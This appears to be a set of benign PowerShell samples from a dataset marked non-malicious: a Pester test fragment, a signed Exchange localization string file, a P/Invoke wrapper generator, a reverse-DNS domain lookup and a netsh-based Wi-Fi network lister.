-Culture $testCulture } | Should -Not -Throw } It "Should accept a culture by int string LCID" { if ( (Get-Culture).LCID -eq 1049 ) { $testCulture = "4096" } else { $testCulture = "1049" } {$testObject | Group-Object -Culture $testCulture } | Should -Not -Throw } }
combined_dataset/train/non-malicious/sample_9_77.ps1
sample_9_77.ps1
ConvertFrom-StringData @' id_ex_regkeysact=Exchange Server Registry Values '@ # SIG # Begin signature block # MIIoRgYJKoZIhvcNAQcCoIIoNzCCKDMCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBdKgjBTXIWaNR8 # WdnbrPU8i1zbfSfMr18btR9FnWXVMKCCDXYwggX0MIID3KADAgECAhMzAAAEBGx0 # Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz # NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo # DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3 # a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF # HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy # 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC # Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj # L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp # h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3 # cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X # dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL # E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi # u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1 # sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq # 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb # DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/ # V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIAi1iQl1TbDObzjyWJ/tgqle # Ww9XAV75vTlbQuNmiatvMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAahqqbzO7YYtegSeGb6cAD1HVlnnZ+v/6z8ra2fPR973cQ7JOjLmsMUr/ # Rm1Ctp2MN8jlna5vGbQr1uQSYzyxxqPcxqkeyqXT9yTWG77VkjU06RSTpthsDZuZ # b9eQAYPPsf1CGL/NgIlcTIvnpSfQZXBjAJcjy3nnPlFGwtiSNjs3k8KXztZWnbLo # wUUtLwf2/7It8ecy3NvuZCS0oxHkJhOJyrwdbdQr+R/WEYPZgVnMyGzKjWT8AhO4 # UHC65Mdkp6o85xfSsE3T5tL/1S2oX3UgH3R+dEa+1q0BXmmFbNZyaA2GxzT8yPNk # Pu5W2NjAUDqwRzjS1/bse0w11arx0aGCF7AwghesBgorBgEEAYI3AwMBMYIXnDCC # F5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFaBgsq # hkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCNUSZKuIb/ookW0pdR1ATXEyeoklGAZyfbk3/3JCoJggIGZuto66JF # GBMyMDI0MTAyODExNDA0MS41NjRaMASAAgH0oIHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAAB+8vLbDdn5TCVAAEAAAH7MA0G # CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0 # MDcyNTE4MzExM1oXDTI1MTAyMjE4MzExM1owgdMxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w # ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU3MUEt # MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqMJWQeWAq4LwvSjYsjP0 # Uvhvm0j0aAOJiMLg0sLfxKoTXAdKD6oMuq5rF5oEiOxV+9ox0H95Q8fhoZq3x9lx # guZyTOK4l2xtcgtJCtjXRllM2bTpjOg35RUrBy0cAloBU9GJBs7LBNrcbH6rBiOv # qDQNicPRZwq16xyjMidU1J1AJuat9yLn7taifoD58blYEcBvkj5dH1la9zU846QD # eOoRO6NcqHLsDx8/zVKZxP30mW6Y7RMsqtB8cGCgGwVVurOnaNLXs31qTRTyVHX8 # ppOdoSihCXeqebgJCRzG8zG/e/k0oaBjFFGl+8uFELwCyh4wK9Z5+azTzfa2GD4p # 6ihtskXs3lnW05UKfDJhAADt6viOc0Rk/c8zOiqzh0lKpf/eWUY2o/hvcDPZNgLa # HvyfDqb8AWaKvO36iRZSXqhSw8SxJo0TCpsbCjmtx0LpHnqbb1UF7cq09kCcfWTD # PcN12pbYLqck0bIIfPKbc7HnrkNQks/mSbVZTnDyT3O8zF9q4DCfWesSr1akycDd # uGxCdKBvgtJh1YxDq1skTweYx5iAWXnB7KMyls3WQZbTubTCLLt8Xn8t+slcKm5D # kvobubmHSriuTA3wTyIy4FxamTKm0VDu9mWds8MtjUSJVwNVVlBXaQ3ZMcVjijyV # oUNVuBY9McwYcIQK62wQ20ECAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRHVSGYUNQ3 # RwOl71zIAuUjIKg1KjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf # BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww # bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m # dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El # MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF # BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAwzoIKOY2dnUj # fWuMiGoz/ovoc1e86VwWaZNFdgRmOoQuRe4nLdtZONtTHNk3Sj3nkyBszzxSbZEQ # 0DduyKHHI5P8V87jFttGnlR0wPP22FAebbvAbutkMMVQMFzhVBWiWD0VAnu9x0fj # ifLKDAVXLwoun5rCFqwbasXFc7H/0DPiC+DBn3tUxefvcxUCys4+DC3s8CYp7WWX # pZ8Wb/vdBhDliHmB7pWcmsB83uc4/P2GmAI3HMkOEu7fCaSYoQhouWOr07l/KM4T # ndylIirm8f2WwXQcFEzmUvISM6ludUwGlVNfTTJUq2bTDEd3tlDKtV9AUY3rrnFw # HTwJryLtT4IFhvgBfND3mL1eeSakKf7xTII4Jyt15SXhHd5oI/XGjSgykgJrWA57 # rGnAC7ru3/ZbFNCMK/Jj6X8X4L6mBOYa2NGKwH4A37YGDrecJ/qXXWUYvfLYqHGf # 8ThYl12Yg1rwSKpWLolA/B1eqBw4TRcvVY0IvNNi5sm+//HJ9Aw6NJuR/uDR7X7v # DXicpXMlRNgFMyADb8AFIvQPdHqcRpRorY+YUGlvzeJx/2gNYyezAokbrFhACsJ2 # BfyeLyCEo6AuwEHn511PKE8dK4JvlmLSoHj7VFR3NHDk3zRkx0ExkmF8aOdpvoKh # uwBCxoZ/JhbzSzrvZ74GVjKKIyt5FA0wggdxMIIFWaADAgECAhMzAAAAFcXna54C # m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp # Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy # MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH # EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV # BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B # AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51 # yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY # 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9 # cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN # 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua # Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74 # kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2 # K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5 # TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk # i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q # BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri # Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC # BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl # pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB # FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y # eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA # YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU # 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny # bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw # MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w # Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp # b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm # ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM # 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW # OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4 # FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw # xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX # fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX # VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC # onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU # 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG # ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT # Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg # U2VydmljZaIjCgEBMAcGBSsOAwIaAxUABHHn7NCGusZz2RfVbyuwYwPykBWggYMw # gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF # AAIFAOrJT0swIhgPMjAyNDEwMjcyMzQ2MTlaGA8yMDI0MTAyODIzNDYxOVowdzA9 # BgorBgEEAYRZCgQBMS8wLTAKAgUA6slPSwIBADAKAgEAAgINvAIB/zAHAgEAAgIU # vzAKAgUA6sqgywIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow # CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCt9+78tOBk # 3G7InFWNeSnv+gNf7827NofcCXCIrLQa834+WZOE6YjVcA8B4zRZWYQt61ryjsP7 # nO4QK9AT7twzBe+cVhqFCO+umtt9HILo/02fBvZqGhC0aABNMEKKtN5mHLc0RqyR # jYVeyJJgW3o+AuIAomNefMMnMlPFbCzeVx+VWfowu6aZGIf20olcJr1Udx5TxmnY # dsKjQyDDl6Lmtl54TbeWFF6Uai0RRHKqDZXeiYK0nnazQchF9LlhnVpwArQ160lu # nLrYsrAoYdqLC+X0Bz+PmzShMHudHvUpm9HSYaJSjBDw/SBZA3RVy2I0EMGwb608 # ErihFwOktb8UMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAH7y8tsN2flMJUAAQAAAfswDQYJYIZIAWUDBAIBBQCgggFKMBoG # CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgzwaEYwo7 # OLghpUScLnxRtK0Ff5VtyfbgkjABt2zv9rkwgfoGCyqGSIb3DQEJEAIvMYHqMIHn # MIHkMIG9BCA52wKr/KCFlVNYiWsCLsB4qhjEYEP3xHqYqDu1SSTlGDCBmDCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB+8vLbDdn5TCVAAEA # AAH7MCIEIOcOJM95z1rtLRPImI9GcCxcLV/lXPRviSc4qDRq2ZeFMA0GCSqGSIb3 # DQEBCwUABIICACiL1OfuAB6rSds7j4h+ztF6oj56Bw+H4HYVMwha9COrxg20Af5n # khgSNj2cVUfcsbCzx/6TKSgivoI6X+xF7NvSC1mGR7oStUz5XsFs+76UCWNfZ2v5 # rqiEA0CI0ow7XDf2tC0QwuAqxhTvZEZnWtQacOB2T8rEMj2NFQbeP/XCJa5eVc/e # cLWdWYY6DqhJjCpGXenwQuVtXsmNwncTH0ScMoMufsOU7eVsBCl60OcWijgh0nVW # sjLUCj+n3o7xSMurWD0bvVl9EsRtnzHB94/MIpokYRStO2kg+DHCj8Ubi6DuSGwF # HwfLKSl4YWyCCbVdIXFa98Ks8SbDY7Opp5cBKi8gl02jjx/y1tEbzbxhU389zj0k # UNXjlB4KnncsPR93Q49rhV6jP8qkgbi0L7Ir8Lm/wmGtIQoYOKutqq39vHmnmq7s # PsGA/ybn1Dl4A2LaonUeNzftCkD0nqSbkWXJO7AiTuk6F2mwSI0UyGRxbJp2iXjj # OYf+yLFKDAyJR1ufEJ2Xl5RWKE3VpSHwRN2B6nJ9JEbo491REV7Dk5uvvczfmR8n # +BF9Jpw/hDzRyVsTSH94PfwYGTeQUJIzxX8pqYfBM+FG8d66DtmolKsyHauMUO4+ # 7nCfJNZJZjOGLDodgrCWLXixF+9Z0NLON3ZLJyfuwaRWq4AmRM7KFVB2 # SIG # End signature block
combined_dataset/train/non-malicious/New-PInvoke_1.ps1
New-PInvoke_1.ps1
function New-PInvoke { <# .Synopsis Generate a powershell function alias to a Win32|C api function .Description Creates C# code to access a C function, and exposes it via a powershell function .Example New-PInvoke user32 "void FlashWindow(IntPtr hwnd, bool bInvert)" Generates a function for FlashWindow which ignores the boolean return value, and allows you to make a window flash to get the user's attention. Once you've created this function, you could use this line to make a PowerShell window flash at the end of a long-running script: C:\\PS>FlashWindow (ps -id $pid).MainWindowHandle $true .Parameter Library A C Library containing code to invoke .Parameter Signature The C# signature of the external method .Parameter OutputText If Set, retuns the source code for the pinvoke method. If not, compiles the type. #> param( [Parameter(Mandatory=$true, HelpMessage="The C Library Containing the Function, i.e. User32")] [String] $Library, [Parameter(Mandatory=$true, HelpMessage="The Signature of the Method, i.e.: int GetSystemMetrics(uint Metric)")] [String] $Signature, [Switch] $OutputText ) process { if ($Library -notlike "*.dll*") { $Library+=".dll" } if ($signature -notlike "*;") { $Signature+=";" } if ($signature -notlike "public static extern*") { $signature = "public static extern $signature" } $name = $($signature -replace "^.*?\\s(\\w+)\\(.*$",'$1') $MemberDefinition = "[DllImport(`"$Library`")]`n$Signature" if (-not $OutputText) { $type = Add-Type -PassThru -Name "PInvoke$(Get-Random)" -MemberDefinition $MemberDefinition iex "New-Item Function:Global:$name -Value { [$($type.FullName)]::$name.Invoke( `$args ) }" } else { $MemberDefinition } } }
combined_dataset/train/non-malicious/Get-MyDomain.ps1
Get-MyDomain.ps1
Function Get-MyDomain() { # Written by Jeremy D. Pavleck - Pavleck.NET $IP = ((Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=TRUE -ComputerName . | Select-Object -Property IPAddress -First 1).IPAddress[0]) trap { return "Unknown:$($IP)" } return [System.Net.DNS]::GetHostByAddress($IP).HostName }
combined_dataset/train/non-malicious/Get-WifiNetwork.ps1
Get-WifiNetwork.ps1
function Get-WifiNetwork { end { netsh wlan sh net mode=bssid | % -process { if ($_ -match '^SSID (\\d+) : (.*)$') { $current = @{} $networks += $current $current.Index = $matches[1].trim() $current.SSID = $matches[2].trim() } else { if ($_ -match '^\\s+(.*)\\s+:\\s+(.*)\\s*$') { $current[$matches[1].trim()] = $matches[2].trim() } } } -begin { $networks = @() } -end { $networks|% { new-object psobject -property $_ } } } } ps> Get-WifiNetwork| select index, ssid, signal, 'radio type' | sort signal -desc | ft -auto
combined_dataset/train/non-malicious/ISE-Comments_2.ps1
ISE-Comments_2.ps1
